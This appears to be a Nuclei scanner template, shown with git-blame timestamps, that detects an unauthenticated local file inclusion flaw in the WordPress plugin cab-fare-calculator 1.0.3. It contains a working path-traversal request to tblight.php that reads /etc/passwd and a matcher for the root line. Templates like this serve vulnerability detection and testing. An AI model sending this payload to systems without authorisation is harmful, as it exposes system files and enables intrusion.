nuclei-templates/vulnerabilities/wordpress/cab-fare-calculator-lfi.yaml

24 lines
614 B
YAML
Raw Normal View History

2022-03-30 05:42:22 +00:00
id: cab-fare-calculator
info:
name: WordPress Plugin cab-fare-calculator 1.0.3 - Local File Inclusion - Unauthenticated
author: Hassan Khan Yusufzai - Splint3r7
severity: high
2022-04-02 09:54:02 +00:00
reference: https://www.exploit-db.com/exploits/50844
2022-03-30 05:42:22 +00:00
tags: wordpress,wp-plugin,lfi,wp
requests:
- method: GET
path:
2022-04-02 09:54:02 +00:00
- '{{BaseURL}}/wp-content/plugins/cab-fare-calculator/tblight.php?controller=../../../../../../../../../../../etc/passwd&action=1&ajax=1'
2022-03-30 05:42:22 +00:00
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
2022-04-02 09:54:02 +00:00
- 200